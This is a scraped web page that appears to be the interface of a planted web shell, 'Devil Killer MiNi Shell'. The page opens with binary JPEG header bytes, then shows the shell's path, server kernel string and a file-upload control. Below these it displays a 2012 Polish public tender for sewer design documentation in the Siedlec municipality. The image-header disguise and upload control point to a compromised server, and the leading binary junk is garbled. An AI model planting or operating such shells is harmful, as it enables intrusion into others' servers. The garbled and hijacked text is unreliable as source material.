JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121015/398874-N-2012.html

<p class="kh_header"><b>Siedlec: Wykonanie dokumentacji projektowej wraz z pozwoleniami na budowę kanalizacji sanitarnej dla miejscowości Jaromierz, Kopanica, Mała Wieś, położonych w Gminie Siedlec</b><br>
<b>Numer ogłoszenia: 398874 - 2012; data zamieszczenia: 15.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Eksploatacji Urządzeń Komunalnych Sp. z o.o. , ul. Zbąszyńska 15, 64-212 Siedlec, woj. wielkopolskie, tel. 68 384 80 80, faks 68 384 80 80.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zeuk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego z jednosobowym udziałem jst.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej wraz z pozwoleniami na budowę kanalizacji sanitarnej dla miejscowości Jaromierz, Kopanica, Mała Wieś, położonych w Gminie Siedlec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZAKRES PRZEDMIOTU ZAMÓWIENIA OBEJMUJE:
* ZADANIE 1 - Opracowanie dokumentacji projektowo - kosztorysowej kanalizacji sanitarnej dla m. Jaromierz.
Przedmiotowa dokumentacja projektowo - kosztorysowa swoim zasięgiem obejmuje:
- sieć kanalizacji sanitarnej grawitacyjnej wraz z przykanalikami na terenie wsi Jaromierz wraz z niezbędną ilością przepompowni ścieków i z rurociągami tłocznymi oraz centralną tłocznią i rurociągiem tłocznym włączonym do istniejącego rurociągu tłocznego położonego w obrębie skrzyżowania drogi gminnej z Żodynia z drogą powiatową z m. Obra do drogi krajowej nr 32.
- sieć kanalizacji sanitarnej grawitacyjnej wraz z przykanalikami na terenie przysiółka Marianice wraz z niezbędną ilością przepompowni ścieków studni rozprężnej połączonej z projektowaną siecią kanalizacji grawitacyjnej w m. Jaromierz.
* ZADANIE 2 -Opracowanie dokumentacji projektowo - kosztorysowej kanalizacji sanitarnej dla m. Kopanica.
Przedmiotowa dokumentacja projektowo - kosztorysowa swoim zasięgiem obejmuje:
- sieć kanalizacji sanitarnej grawitacyjnej wraz z przykanalikami na terenie wsi Kopanica wraz z niezbędną ilością przepompowni ścieków, lokalnymi rurociągami tłocznymi i rurociągiem tłocznym do projektowane kanalizacji sanitarnej w m. Jaromierz.
* ZADANIE 3- Opracowanie dokumentacji projektowo - kosztorysowej kanalizacji sanitarnej dla m. Mała Wieś
Przedmiotowa dokumentacja projektowo - kosztorysowa swoim zasięgiem obejmuje:
- sieć kanalizacji sanitarnej grawitacyjnej wraz z przykanalikami na terenie wsi  Mała Wieś wraz z niezbędną ilością przepompowni ścieków i rurociągiem tłocznym włączonym do projektowanej sieci kanalizacji sanitarnej m. Kopanica.

ZAKRES ZAMÓWIENIA OBEJMUJE: (w stosunku do każdego zadania)
a)	   zakup map sytuacyjno wysokościowych do celów projektowych,
b)	wykonanie badań geologicznych, niezbędnych dokumentacji geodezyjnych i geologiczno - inżynierskich w koniecznym zakresie wg uznania projektanta;
c)	przygotowanie dokumentów niezbędnych do uzyskania prawomocnej decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia (aktualna decyzja traci ważność;
d)	przygotowanie dokumentów niezbędnych do uzyskania prawomocnej decyzji o lokalizacji inwestycji celu publicznego;
e)	opracowanie projektu budowlanego spełniającego wymogi przepisów Prawa Budowlanego i innych  przepisów szczególnych  wraz z opisami i rysunkami niezbędnymi do realizacji robót, w razie potrzeby uzupełnionego szczegółowymi projektami umożliwiającymi wykonanie zamówienia bez konieczności dodatkowych opracowań - w liczbie 6 egzemplarzy,
(opracowania projektu budowlanego z podziałem na poszczególne etapy uzgodnione z Zamawiającym);
f)	
UWAGA:
Projekt budowlany winien obejmować swym zakresem całość zadania tj. sieci kanalizacji  sanitarnej  grawitacyjno - ciśnieniowej na terenie w/w miejscowości wraz z niezbędną ilością  przepompowni ścieków, rurociągami tłocznymi pomiędzy miejscowościami oraz przykanalikami od kolektora głównego do granicy nieruchomości; dokumentacja winna obejmować również projekt zasilania energetycznego (zalicznikowego) przepompowni ścieków od złącza kablowego stanowiącego punkt pomiarowo - rozliczeniowy do szafki sterowniczej w obiekcie przepompowni ścieków;
g)	opracowanie projektów wykonawczych - 6 egz;
h)	w przypadkach koniecznych - uzyskanie wymaganych uzgodnień i przygotowanie dokumentów niezbędnych do uzyskania prawomocnego pozwolenia wodnoprawnego;
i)	uzyskanie wszystkich wymaganych uzgodnień niezbędnych do otrzymania pozwolenia na budowę;
j)	w przypadkach koniecznych wskazanie nieruchomości objętych projektowaną lokalizacją obiektu, dla których konieczny będzie ich podział zgodnie z koncepcją projektową;
k)	opracowanie specyfikacji technicznej wykonania i odbioru robót budowlanych, przez którą należy rozumieć opracowanie zawierające zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące w szczególności wymagania właściwości materiałów, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót oraz zakresu prac- w liczbie 2 egzemplarzy - z podziałem na etapy uzgodnione z Zamawiającym;
l)	opracowanie przedmiarów robót, przez które należy rozumieć opracowanie zawierające opis robót budowlanych w kolejności technologicznej ich wykonania, z podaniem liczby jednostek przedmiarowych robót, wynikających z dokumentacji projektowej, oraz podstaw do ustalenia cen jednostkowych robót lub nakładów rzeczowych  łącznie ze  wskazaniem właściwych specyfikacji technicznych wykonania i odbioru robót budowlanych,  - w liczbie 2 egzemplarzy - z podziałem na etapy uzgodnione z Zamawiającym;
m)	opracowanie druków kosztorysów ofertowych, które posłużą Wykonawcy robót budowlanych do przygotowania oferty (w w/w druku należy przewidzieć rubrykę cena jednostkowa i wartość zadania netto do wypełnienia przez Wykonawcę robót budowlanych) - z podziałem na etapy uzgodnione z Zamawiającym- 1 egz.;
n)	opracowanie zbiorczego zestawienia kosztów przedmiotowej inwestycji w 1 egzemplarzu- z podziałem na etapy uzgodnione z Zamawiającym;
o)	opracowanie kosztorysu inwestorskiego - z podziałem na etapy uzgodnione z Zamawiającym, który należy wykonać zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja  2004r w sprawie określenia  metod i podstaw sporządzania kosztorysu  inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określanych w programie funkcjonalno -użytkowym, (Dz. U. z 2004 r. Nr 130, poz. 1389) - w 1 egzemplarzu,
UWAGA:
w zakres zamówienia wchodzi również jednorazowa aktualizacja kosztorysu inwestorskiego przeprowadzona przez Wykonawcę do końca 2013r.;
p)	pełnienie nadzoru autorskiego.
q)	dokumentacja projektowa winna zostać  opracowana wg obowiązujących przepisów formalno - prawnych umożliwiających uzyskanie pozwolenia na budowę i właściwy tryb prowadzenia wykonawstwa robót. Wykonawca projektu  zobowiązany jest  uzyskać wymagane opinie, uzgodnienia i sprawdzenia rozwiązań projektowych w zakresie obowiązujących przepisów.
UWAGA:
Forma i zakres przedmiotowego zamówienia publicznego winna być zgodna z:
* Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r w sprawie określenia metod i podstaw sporządzania kosztorysu  inwestorskiego, obliczania planowanych kosztów prac projektowych  oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno- użytkowym  (Dz. U. z 2004r nr 130, poz. 1389).
* Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno -użytkowego.

WYMOGI  w stosunku do opracowań projektowo - kosztorysowych:
* Opracowania projektowo - kosztorysowe Wykonawca zobowiązany jest do wykonania z podziałem na etapy uzgodnione z zamawiającym.
* Na potrzeby dokumentacji projektowej należy sporządzić bilans ścieków dla poszczególnych miejscowości wymienionych w/w zadaniach, uwzględniający rozbudowę sieci kanalizacyjnej i późniejsze przyłączenie wsi Wąchabno do zlewni Małej Wsi oraz wsi Wielka Wieś do zlewni  Mała Wieś lub Kopanica. 
* Dobór tłoczni powinien uwzględniać przepływy z w/w zadań powiększone o przepływy z miejscowości przeznaczonych do podłączenia w perspektywie. 

UWAGI w stosunku do map projektowych i zakresu opracowania:
W celu oszacowania kosztów wykonania map sytuacyjno - wysokościowych, niezbędnych do opracowania dokumentacji projektowej, powierzchnię obszaru, którego dotyczy przedmiot zamówienia należy określić na podstawie orientacyjnych załączników graficznych do SIWZ oraz wizji w terenie.
Zakres opracowania powyższych map musi spełniać wymogi § 6 Rozporządzenia Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21.02.1995r. w sprawie rodzaju i zakresu opracowań geodezyjno - kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie (Dz.U. nr 25, poz. 133).
Opracowanie winno zawierać:
	a) usytuowanie naziemnych szczegółów terenowych łącznie z granicami władania    (własności) i nieruchomości (działek) i z uwzględnieniem istniejącej zieleni  wysokiej, 
	b) naturalne i sztuczne ukształtowanie pionowe terenu,
	c) usytuowanie sieci uzbrojenia terenu z ich charakterystycznymi rzędnymi,
	d) opracowanie geodezyjne linii rozgraniczających oraz osie ulic i dróg, jeżeli zostały ustalone w miejscowym planie zagospodarowania przestrzennego, w decyzji o ustaleni lokalizacji inwestycji lub też w zatwierdzonym planie realizacyjnym inwestycji.
Mapy sytuacyjno - wysokościowe do celów projektowych w skali 1:500 w zakresie terenów wsi winny obejmować obręb zabudowań wraz z obrysami budynków oraz działki niezabudowane, na których wszczęto procedurę formalno-prawną zmierzającą do wydania decyzji o warunkach zabudowy w okresie do końca 2014r. , z zachowaniem wymogów określonych powyżej.
Mapy sytuacyjno - wysokościowe do celów projektowych w skali 1:1000 w zakresie terenów pasów drogowych łączących miejscowości, winny obejmować pas o szerokości 50m oraz zabudowania i obrysy budynków zlokalizowanych przy tych drogach, z zachowaniem wymogów określonych powyżej.
UWAGA: 
W przypadku lokalizacji zabudowy poza obrębem (szerokością) pasa drogowego - w odległości do 100m od pasa drogowego - mapy winny być opracowane jak dla terenu wsi.
Wykonawca winien zaprojektować sieć pozwalającą na odprowadzenie ścieków z budynków istniejących oraz będących w trakcie budowy. W przypadku działek niezabudowanych, przy projektowaniu przykanalików do granic nieruchomości, należy uwzględnić te działki, na których wszczęto procedurę formalno - prawną, zmierzającą do wydania decyzji o warunkach zabudowy obiektu budowlanego w okresie do końca I półrocza 2013 r. (tj. 30.06.2013 r.) 
Zakres rzeczowy przedmiotowego zamówienia publicznego jest przewidywanym zakresem do opracowania. W przypadku braku technicznej możliwości grawitacyjnego odprowadzenia ścieków na terenie poszczególnych miejscowości, należy założyć konieczność opracowania niezbędnej dokumentacji dla kanalizacji grawitacyjno - ciśnieniowej wraz z niezbędną ilością przepompowni ścieków. 
Wobec powyższego zaleca się, aby Wykonawca dokonał wizji lokalnej w terenie objętym przedmiotowym zamówieniem oraz zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty.
Lokalizacja studzienki  przykanalika winna być ustalona po konsultacji z właścicielem posesji (lokalizacja potwierdzona pisemnie przez właściciela posesji), winna ona uwzględniać istniejącą wewnętrzną instalację kanalizacyjną oraz techniczne możliwości odprowadzenia ścieków z budynku. 
Wykonawca we własnym zakresie pozyska mapy sytuacyjno - wysokościowe do celów projektowych terenu objętego opracowaniem.
UWAGA: 
Proponowana lokalizacja sieci kanalizacji sanitarnej wraz z przykanalikami oraz ewentualne rozwiązania  techniczne winny być przedłożone do akceptacji w ZEUK   Sp z o.o. przed złożeniem wniosków o wydanie uzgodnień przez jednostki branżowe.

WYMOGI w stosunku do nadzoru autorskiego:
* W przypadkach koniecznych Wykonawca zobowiązany jest do sprawowania nadzoru autorskiego na wniosek Zamawiającego.
* Jednorazowy pobyt projektanta na budowie obejmuje:
- przygotowanie materiałów do pełnienia nadzoru,
- czas przejazdu (w normalnym czasie pracy) z siedziby Wykonawcy na budowę i powrót,
- czas pobytu w jednym dniu,
- załatwienie spraw związanych z nadzorem po powrocie,
- koszty przejazdu na budowie.
* Każdy pobyt Wykonawcy na budowie potwierdzony będzie przez Inspektora Nadzoru i Zamawiającego i określony będzie charakter wykonywanych czynności.
* Maksymalna ilość pobytu na budowie w ramach pełnienia nadzoru autorskiego w liczbie 10 dla każdego zadania.

UWAGI ogólne:
Cała dokumentacja projektowo - kosztorysowa winna zostać dostarczona Zamawiającemu w wersji pisemnej w  ilościach  opisanych powyżej  oraz w wersji elektronicznej (na nośniku typu CD) umożliwiającej zgodnie z nowelizowanym prawem zamówień publicznych  umieszczenie  całej dokumentacji jako załącznika do SIWZ na stronie internetowej i jej pobranie:
* projekt budowlany, projekt wykonawczy w plikach z rozszerzeniem .tif lub .jpg (zeskanowany projekt z uzyskanymi wszystkimi wymaganymi uzgodnieniami)
* specyfikacje techniczne wykonania i odbioru robót w plikach z  rozszerzeniem .doc,
* kosztorysy inwestorskie, kosztorysy ofertowe, przedmiary robót, zbiorcze zestawienia kosztów w plikach z rozszerzeniem .ath.
Zamawiający dopuszcza możliwość wyłączenia z realizacji części prac objętych przetargiem. Decyzja o zakresie jw. zostanie podjęta w toku procesu inwestycyjnego.

TEREN objęty opracowaniem:
ZAD. nr 1 - teren zwartej zabudowy miejscowości Jaromierz, do nieczynnej linii kolejowej biegnącej wzdłuż drogi karajowej nr 32 od strony zachodniej, do Kanału Północnego od strony południowej, odcinek od Kanału Północnego Obry wraz z przejściem przez kanał w kierunku przysiółka Marianice, zwartą zabudowę tej wsi oraz w kierunku wschodnim odcinek od granicy Jaromierza w kierunku miejscowości Jażyniec do skrzyżowania drogi powiatowej z drogą gminną z Żodynia; - zgodnie z orientacyjnym załącznikiem graficznym stanowiącym załącznik do SIWZ
ZAD. nr 2 - teren zwartej zabudowy miejscowości Kopanica, odcinek w kierunku Małej Wsi do Kanału Północnego Obry, obszar do granicy z Kanałem Północnym  od strony południowym oraz obszar m. Jaromierz położony przy drodze krajowej nr 32, przejście pod drogą krajową oraz torem kolejowym do połączenia z obszarem określonym w zad.nr1. - zgodnie z orientacyjnym załącznikiem graficznym stanowiącym załącznik nr do SIWZ
ZAD. nr 3 - teren zwartej zabudowy miejscowości Mała Wieś. zgodnie z orientacyjnym załącznikiem graficznym stanowiącym załącznik nr do SIWZ wraz z połączeniem pod Kanałem Obry z zadaniem nr 2  

Przedmiot zamówienia składa się z dwóch etapów:          
* I etap realizacji przedmiotowego zamówienia obejmuje przedstawienie Zamawiającemu map do celów projektowych z naniesioną wstępną koncepcją projektowanej kanalizacji sanitarnej.
* II etap realizacji przedmiotowego zamówienia obejmuje wykonanie zamówienia w pozostałym zakresie.
* III etap realizacji przedmiotowego zamówienia obejmuje pełnienie nadzoru autorskiego nad robotami budowlanymi objętymi dokumentacją projektowo-kosztorysową kanalizacji sanitarnej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca wniesie wadium w wysokości : 3.900,00 zł (słownie: trzy tysiące dziewięćset złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W niniejszym postępowaniu nie jest wymagane posiadanie zezwolenia, koncesji licencji</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał co najmniej 2 usługi, każda o wartości netto minimum 65.000,00 zł, polegające na wykonaniu dokumentacji projektowej dotyczącej budowy sieci kanalizacji sanitarnej, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W niniejszym postępowaniu Zamawiający nie wymaga szczegółowego wykazania spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował, zarówno na etapie udzielenia zamówienia, jak i jego realizacji co najmniej jedną osobą posiadającą uprawnienia do projektowania, określone przepisami ustawy z dnia 7 lipca 1994 roku Prawo budowlane (Dz.U. z 2010 r., Nr 243, poz. 1623 ze zmianami) lub odpowiadające im ważne uprawnienia budowlane, w tym również wydane w trybie uznawania kwalifikacji zawodowych cudzoziemców, i która uczestniczyć będzie w wykonywaniu zamówienia, w specjalności:
	a) instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W niniejszym postępowaniu Zamawiający nie wymaga szczegółowego wykazania spełnienia tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.      Wszelkie zmiany niniejszej umowy wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności.

2.	Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do umowy w przypadku gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT).
3.	Zamawiający przewiduje możliwość zmiany wysokości wynagrodzenia  jeżeli nastąpi zmiana zakresu usług na skutek ważnych, niezależnych od Zamawiającego przyczyn nie znanych Zamawiającemu w momencie zawarcia umowy,  z odpowiednim obniżeniem wynagrodzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zeuk.pl<br>
